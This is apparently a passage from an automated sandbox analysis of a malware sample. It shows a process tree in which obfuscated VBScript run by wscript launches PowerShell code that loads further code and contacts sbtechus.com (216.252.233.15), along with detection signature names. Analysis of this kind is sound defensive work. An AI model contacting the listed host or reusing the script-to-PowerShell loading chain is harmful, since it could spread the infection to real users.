                             -> reg.exe [1 1] started
                   -> conhost.exe started
              -> wscript.exe [1] started
                   Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
                   -> powershell.exe [14 18] started
                        DNS/IP: sbtechus.com 216.252.233.15, ports 49782, 80, SATLYNX_AGCZ, Switzerland
                        Signatures: Found suspicious powershell code related to unpacking or dynamic code loading
                        -> conhost.exe started

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.